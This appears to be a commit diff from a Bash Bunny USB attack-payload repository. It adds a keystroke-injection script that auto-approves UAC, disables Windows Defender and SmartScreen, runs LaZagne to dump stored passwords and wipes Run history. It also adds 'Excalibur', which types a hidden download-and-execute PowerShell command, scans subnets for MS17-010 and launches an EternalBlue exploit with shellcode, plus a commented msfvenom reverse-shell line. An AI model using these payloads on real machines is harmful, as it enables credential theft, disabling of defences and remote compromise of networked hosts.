

13 Commits

Author SHA1 Message Date
Dvir S. 1b8d0c09fb
Merge ff49f78114 into 9bc2a0312d 2024-10-02 14:27:16 -04:00
Peaks 9bc2a0312d
Merge pull request #691 from rafa-guillermo/master
Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny
2024-10-02 13:52:59 -04:00
Rafa Guillermo f7cf46fd95
Update payload.ps1
added missed $drivelabel reference
2024-09-30 20:21:11 +02:00
Rafa Guillermo 774cc77212 fix shell.bat again 2024-09-30 13:15:25 +02:00
Rafa Guillermo 5da19abe97 updated payload to make drive label and switch generic 2024-09-30 13:14:28 +02:00
Rafa Guillermo b1cf7e8ef4 restore file 2024-09-30 07:16:26 +02:00
Rafa Guillermo 9bcb7f9240 restore quarantined file 2024-09-30 07:15:46 +02:00
Rafa Guillermo bf149a783b Update payload.txt 2024-09-29 20:00:26 +02:00
Rafa Guillermo bc36c76444 restore quarantined file in different bibrary 2024-09-29 19:55:05 +02:00
Rafa Guillermo 6a260cfd4b Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny 2024-09-29 17:06:22 +02:00
Dvir S. Sasson ff49f78114
Added Excalibur 2018-02-11 14:05:17 +02:00
Dviros 5257babf79 Unknown Change 2018-02-11 14:03:14 +02:00
Dvir S. Sasson cf78ba8430
Merge pull request #1 from hak5/master
Pull
2018-02-11 13:47:37 +02:00
8 changed files with 579 additions and 239 deletions


@ -0,0 +1,6 @@
$drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue


@ -0,0 +1,90 @@
#!/bin/bash
#
# Title: Disable Windows Defender and Exfil stored passwords
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
# Author: rafa-guillermo
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
# Version: 1.2
# Category: Credentials
# Target: Windows
# Tested On: Windows 11
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber
######## Set-up ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DRIVE_LABEL=BashBunny
######## Make Loot Dir ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
####### Open a powershell window with elevated privileges #######
LED STAGE1
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
# Disable Windows Defender File Scan and and Real Time Protection
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
QUACK ENTER
sleep 1
# Run laZagne
LED STAGE2
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
QUACK ENTER
QUACK STRING \& \$scriptPath
QUACK ENTER
sleep 10
QUACK STRING exit
QUACK ENTER
# Re-enable Defender and Smart screen
LED CLEANUP
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
QUACK ENTER
sleep 1
QUACK STRING exit
QUACK ENTER
######## FINISH ########
LED FINISH
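Review bot: The header comment and the README in this commit both state that Defender is re-enabled after execution, but the cleanup stage at the end of this file only runs if every earlier step succeeds and the second UAC prompt is accepted; there is no trap or failure path, so an interrupted run leaves real-time protection, IOAV, behaviour monitoring and script scanning disabled on the host. Suggest saying so in the header, e.g. `# NOTE: cleanup is best-effort; if the run is interrupted, the Defender and SmartScreen settings changed above stay disabled and must be restored manually`. Two documentation mismatches: the header says `# Version: 1.2` while the README added in the same commit says 1.0, and the README points to line 22 of payload.txt for the drive label while `DRIVE_LABEL=BashBunny` is on line 20 of this file. It is also worth stating the tested Defender configuration in the header, since on hosts where Tamper Protection is enabled the `Set-MpPreference` calls are presumably rejected and the "Tested On: Windows 11" claim would not hold as written.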


@ -0,0 +1,39 @@
# NoDefenseAgainstLaZagne
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
* Version: 1.0
* Frimware support: 1.1 and higher
* Target version: Windows 11
* Tested on: Windows 11
## Description
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
## Configuration
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
4. Plug your BashBunny and Enjoy
## Info
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
## Disclaimer
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
## Led status
| LED | Status |
|-----------------------------------------------|--------|
| Magenta solid | Setup |
| Yellow single blink | Attack |
| Green 1000ms VERYFAST blink followed by SOLID | Finish |


@ -1,239 +0,0 @@
function Get-BrowserInformation {
<#
.SYNOPSIS
Dumps Browser Information
Author: @424f424f
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Enumerates browser history or bookmarks for a Chrome, Internet Explorer,
and/or Firefox browsers on Windows machines.
.PARAMETER Browser
The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All'
.PARAMETER Datatype
Type of data to enumerate, 'History' or 'Bookmarks'
.PARAMETER UserName
Specific username to search browser information for.
.PARAMETER Search
Term to search for
.EXAMPLE
PS C:\> Get-BrowserInformation
Enumerates browser information for all supported browsers for all current users.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1
Enumerates bookmarks for Internet Explorer for the user 'user1'.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github'
Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns
results matching the search term 'github'.
#>
[CmdletBinding()]
Param
(
[Parameter(Position = 0)]
[String[]]
[ValidateSet('Chrome','IE','FireFox', 'All')]
$Browser = 'All',
[Parameter(Position = 1)]
[String[]]
[ValidateSet('History','Bookmarks','All')]
$DataType = 'All',
[Parameter(Position = 2)]
[String]
$UserName = '',
[Parameter(Position = 3)]
[String]
$Search = ''
)
function ConvertFrom-Json20([object] $item){
#http://stackoverflow.com/a/29689642
Add-Type -AssemblyName System.Web.Extensions
$ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer
return ,$ps_js.DeserializeObject($item)
}
function Get-ChromeHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find Chrome History for username: $UserName"
}
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Chrome'
DataType = 'History'
Data = $_
}
}
}
}
function Get-ChromeBookmarks {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName"
} else {
$Json = Get-Content $Path
$Output = ConvertFrom-Json20($Json)
$Jsonobject = $Output.roots.bookmark_bar.children
$Jsonobject.url |Sort -Unique | ForEach-Object {
if ($_ -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'Bookmark'
Data = $_
}
}
}
}
}
function Get-InternetExplorerHistory {
#https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/
$Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
$Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
ForEach($Path in $Paths) {
$User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value
$Path = $Path | Select-Object -ExpandProperty PSPath
$UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs"
if (-not (Test-Path -Path $UserPath)) {
Write-Verbose "[!] Could not find IE History for SID: $Path"
}
else {
Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object {
$Key = $_
$Key.GetValueNames() | ForEach-Object {
$Value = $Key.GetValue($_)
if ($Value -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'IE'
DataType = 'History'
Data = $Value
}
}
}
}
}
}
}
function Get-InternetExplorerBookmarks {
$URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue
ForEach ($URL in $URLs) {
if ($URL.FullName -match 'Favorites') {
$User = $URL.FullName.split('\')[2]
Get-Content -Path $URL.FullName | ForEach-Object {
try {
if ($_.StartsWith('URL')) {
# parse the .url body to extract the actual bookmark location
$URL = $_.Substring($_.IndexOf('=') + 1)
if($URL -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $User
Browser = 'IE'
DataType = 'Bookmark'
Data = $URL
}
}
}
}
catch {
Write-Verbose "Error parsing url: $_"
}
}
}
}
}
function Get-FireFoxHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox History for username: $UserName"
}
else {
$Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique
$Value.Value |ForEach-Object {
if ($_ -match $Search) {
ForEach-Object {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'History'
Data = $_
}
}
}
}
}
}
if (!$UserName) {
$UserName = "$ENV:USERNAME"
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-ChromeHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-ChromeBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-InternetExplorerHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-InternetExplorerBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-FireFoxHistory
}
}
}


@ -0,0 +1,42 @@
# If you enjoyed this tool and you found it useful, I'll be happy for donations at 39om67XSXi1eAQNTgLXufw1xwR897JMWwv. Thanks!
# Excalibur
Excalibur is an Eternalblue exploit based "Powershell" for the Bashbunny project.
It's purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
Excalibur may be used only for demostrations purposes only, and the developers are not responsible to any misuse or illegal usage.
# What does it do?
When Excalibur gets connected to the machine, it will run the following:
1. Trys to bypass UAC, or just get administrative rights
2. Gets interface info (IP addresses) and build a network map inside a TXT file.
3. Scans port 445 for the known "MS10-17" ("EternalBlue") vulnerability in every segment found.
4. Exploits every machine and drop a shell to a remote machine.
# How to?
Follow the steps here to compile a shellcode:
https://github.com/vivami/MS17-010
1. Copy payload.txt to the switch folder.
2. Copy the "eternablblue_exploit7.py" and compile it using Pyinstaller:
* "pip install pyinstaller"
* "pyinstaller --onefile MS17-010\eternablblue_exploit7.py"
3. Add your shellcode and the compiled exploiter into "a.zip" and copy it to the "loot" folder".
* a.zip needs to contain a compiled, standalone eternalblue exploiter from "vivami's" repo and the shellcode.
4. Copy the powershell script to (p_v2.ps1) to the loot folder.
# TODO
1. Add persistency in terms of add a new user account, and persistent shell.
2. Exploit other machines and applications in the network, with the credentials added in the persistency step.
3. Exfiltrate sensitive data from the network, outside.
4. Bug fixes, and exploits stabilizations.
# Notes
Excalibur is still in Beta, bugs are iminent.

Binary file not shown.


@ -0,0 +1,331 @@
Add-Type -AssemblyName System.IO.Compression.FileSystem
$ComputerName = $env:COMPUTERNAME
function InterfacesFinder(){
foreach ($Computer in $ComputerName) {
if(Test-Connection -ComputerName $Computer -Count 1 -ea 0) {
try {
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $Computer -EA Stop | ? {$_.IPEnabled}
} catch {
Write-Warning "Error occurred while querying $computer."
Continue
}
foreach ($Network in $Networks) {
$IPAddress = $Network.IpAddress[0]
$SubnetMask = $Network.IPSubnet[0]
if ($SubnetMask -eq '255.255.255.0'){
$SubnetBit = 24
}
if ($SubnetMask -eq '255.255.0.0'){
$SubnetBit = 16
}
if ($SubnetMask -eq '255.0.0.0'){
$SubnetBit = 8
}
$octet =($IPAddress -split ' . ')[-1]-split '\.'
$octet[-1]=0
$octet = $octet -join '.'
$octet = $octet+'/'+$SubnetBit
$targets = "$env:TEMP\targets.txt"
$octet | Out-File -Append -encoding ascii $targets
}
}
}
}
function PScanner(){
$Source = @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace PingCastle.Scanners
{
public class ms17_010scanner
{
static public bool ScanForMs17_010(string computer)
{
Trace.WriteLine("Checking " + computer + " for MS17-010");
TcpClient client = new TcpClient();
client.Connect(computer, 445);
try
{
NetworkStream stream = client.GetStream();
byte[] negotiatemessage = GetNegotiateMessage();
stream.Write(negotiatemessage, 0, negotiatemessage.Length);
stream.Flush();
byte[] response = ReadSmbResponse(stream);
if (!(response[8] == 0x72 && response[9] == 00))
{
throw new InvalidOperationException("invalid negotiate response");
}
byte[] sessionSetup = GetSessionSetupAndXRequest(response);
stream.Write(sessionSetup, 0, sessionSetup.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x73 && response[9] == 00))
{
throw new InvalidOperationException("invalid sessionSetup response");
}
byte[] treeconnect = GetTreeConnectAndXRequest(response, computer);
stream.Write(treeconnect, 0, treeconnect.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x75 && response[9] == 00))
{
throw new InvalidOperationException("invalid TreeConnect response");
}
byte[] peeknamedpipe = GetPeekNamedPipe(response);
stream.Write(peeknamedpipe, 0, peeknamedpipe.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (response[8] == 0x25 && response[9] == 0x05 && response[10] ==0x02 && response[11] ==0x00 && response[12] ==0xc0 )
{
return true;
}
}
catch (Exception)
{
throw;
}
return false;
}
private static byte[] ReadSmbResponse(NetworkStream stream)
{
byte[] temp = new byte[4];
stream.Read(temp, 0, 4);
int size = temp[3] + temp[2] * 0x100 + temp[3] * 0x10000;
byte[] output = new byte[size + 4];
stream.Read(output, 4, size);
Array.Copy(temp, output, 4);
return output;
}
static byte[] GetNegotiateMessage()
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x72, // SMB Command: Negotiate Protocol (0x72)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
0x00,0x00, // Tree id 0
0x44,0x6d, // Process ID 27972
0x00,0x00, // User ID 0
0x42,0xc1, // Multiplex ID 49474
0x00, // WCT 0
0x31,0x00, // BCC 49
0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00, // LANMAN1.0
0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x00, // LM1.2X002
0x02,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x00, // NT LANMAN 1.0
0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00, // NT LM 0.12
};
return EncodeNetBiosLength(output);
}
static byte[] GetSessionSetupAndXRequest(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x73, // SMB Command: Session Setup AndX (0x73)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x0d, // WCT 0
0xff, // AndXCommand: No further commands (0xff)
0x00, // Reserved 00
0x00,0x00, // AndXOffset: 0
0xdf,0xff, // Max Buffer: 65503
0x02,0x00, // Max Mpx Count: 2
0x01,0x00, // VC Number: 1
0x00,0x00,0x00,0x00, // Session Key: 0x00000000
0x00,0x00, // ANSI Password Length: 0
0x00,0x00, // Unicode Password Length: 0
0x00,0x00,0x00,0x00, // Reserved: 00000000
0x40,0x00,0x00,0x00, // Capabilities: 0x00000040, NT Status Codes
0x26,0x00, // Byte Count (BCC): 38
0x00, // Account:
0x2e,0x00, // Primary Domain: .
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x32,0x31,0x39,0x35,0x00, // Native OS: Windows 2000 2195
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x35,0x2e,0x30,0x00 // Native LAN Manager: Windows 2000 5.0
};
return EncodeNetBiosLength(output);
}
private static byte[] EncodeNetBiosLength(byte[] input)
{
byte[] len = BitConverter.GetBytes(input.Length-4);
input[3] = len[0];
input[2] = len[1];
input[1] = len[2];
return input;
}
static byte[] GetTreeConnectAndXRequest(byte[] data, string computer)
{
MemoryStream ms = new MemoryStream();
BinaryReader reader = new BinaryReader(ms);
byte[] part1 = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x75, // SMB Command: Tree Connect AndX (0x75)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x04, // WCT 4
0xff, // AndXCommand: No further commands (0xff)
0x00, // Reserved: 00
0x00,0x00, // AndXOffset: 0
0x00,0x00, // Flags: 0x0000
0x01,0x00, // Password Length: 1
0x19,0x00, // Byte Count (BCC): 25
0x00, // Password: 00
0x5c,0x5c};
byte[] part2 = new byte[] {
0x5c,0x49,0x50,0x43,0x24,0x00, // Path: \\ip_target\IPC$
0x3f,0x3f,0x3f,0x3f,0x3f,0x00
};
ms.Write(part1, 0, part1.Length);
byte[] encodedcomputer = new ASCIIEncoding().GetBytes(computer);
ms.Write(encodedcomputer, 0, encodedcomputer.Length);
ms.Write(part2, 0, part2.Length);
ms.Seek(0, SeekOrigin.Begin);
byte[] output = reader.ReadBytes((int) reader.BaseStream.Length);
return EncodeNetBiosLength(output);
}
static byte[] GetPeekNamedPipe(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x25, // SMB Command: Trans (0x25)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x10, // Word Count (WCT): 16
0x00,0x00, // Total Parameter Count: 0
0x00,0x00, // Total Data Count: 0
0xff,0xff, // Max Parameter Count: 65535
0xff,0xff, // Max Data Count: 65535
0x00, // Max Setup Count: 0
0x00, // Reserved: 00
0x00,0x00, // Flags: 0x0000
0x00,0x00,0x00,0x00, // Timeout: Return immediately (0)
0x00,0x00, // Reserved: 0000
0x00,0x00, // Parameter Count: 0
0x4a,0x00, // Parameter Offset: 74
0x00,0x00, // Data Count: 0
0x4a,0x00, // Data Offset: 74
0x02, // Setup Count: 2
0x00, // Reserved: 00
0x23,0x00, // Function: PeekNamedPipe (0x0023)
0x00,0x00, // FID: 0x0000
0x07,0x00, // Byte Count (BCC): 7
0x5c,0x50,0x49,0x50,0x45,0x5c,0x00 // Transaction Name: \PIPE\
};
return EncodeNetBiosLength(output);
}
}
}
"@
Add-Type -TypeDefinition $Source
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $env:COMPUTERNAME -EA Stop | ? {$_.IPEnabled}
$ping = New-Object System.Net.NetworkInformation.Ping
$a = 1
$z = 254
while ($a -le $z) {
foreach($network in $networks){
$IPAddress = $Network.IpAddress[0]
$octet =($IPAddress -split ' . ')[-1]-split '\.'
$octet[-1]=$a
$octet = $octet -join '.'
if($ping.send($octet,"50").status -eq "Success"){
try{
if ([PingCastle.Scanners.ms17_010scanner]::ScanForMs17_010($octet) -eq "True"){
Write-Output "Machine $octet is vulnerable!" > $env:Temp\results.txt
}
}
catch{
}
}
}
$a++
}
}
function Unzip
{
param([string]$zipfile, [string]$outpath)
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
function Exploit(){
$results = Get-Content "$env:TEMP\results.txt"
#Meterpreter: Generate a new binary payload, call it .raw and copy it to the temp folder
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=31337 -f raw > meterpreter.raw
#$meterpreter = Get-Content "$env:TEMP\meterpreter.raw"
#$shellcode = Get-Content "$env:TEMP\shellcode.bin"
#Combines the binary ASM shellcode and the binary meterpreter payload
#$shellcode | Out-File -Append "$env:TEMP\shellcode_exploit.bin"
#$meterpreter | Out-File -Append "$env:TEMP\shellcode_exploit.bin"
foreach ($result in $results) {
#Invoke-EternalBlue -target $result -max_attempts 3 -initial_grooms 12
& $env:TEMP\eternalblue_exploit7.exe $result $env:TEMP'\shellcode_kali.bin' '12'
}
}
InterfacesFinder
powershell Start-Sleep 1 ;
PScanner
powershell Start-Sleep 1 ;
Invoke-WebRequest 'http://172.16.64.1/a.zip' -OutFile "$env:TEMP\a.zip"
Unzip $env:Tmp"\a.zip" $env:Tmp"\"
Exploit
#TODO
#persistency
#Add a new user account.
#Obfuscation
#delete temp files, Generate a report to the loot folder.


@ -0,0 +1,71 @@
#!/bin/bash
# .-.
# (0.0)
# '=.|m|.='
# .='/@\`=.
# @8@
# _ 8@8 _
# (@__/@8@\__@)
# `-=:8@8:=-'
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# \:/
# ^
#
# Title: Excalibur
# Author: Dviros, Dora
# Version: 1.0
#
# Excalibur is an APT based "Powershell" for the Bashbunny project.
# Its purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/Excalibur
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p_v2.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED SPECIAL2
sleep 60
done
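Review bot: The last line of the file is a bare `done` with no matching `while` or `for`, which bash reports as a syntax error once it reaches that line; the stray token should be removed. The script also depends on `$SWITCHDIR/server.py` and on the host fetching `p_v2.ps1` from `172.16.64.1`, but server.py is not part of this commit and the README only says to copy p_v2.ps1 and a.zip into the loot folder, so a header sentence naming what server.py is expected to serve, and from which directory (presumably `$SWITCHDIR/loot`, which this file creates), would close that documentation gap. `LOOTDIR` is created and then never used, and `iptables -A OUTPUT -p udp --dport 53 -j DROP` carries no comment explaining why outbound DNS is dropped. Style: quote the expansions, `mkdir -p "$LOOTDIR"` and `mkdir -p "$SWITCHDIR/loot"`.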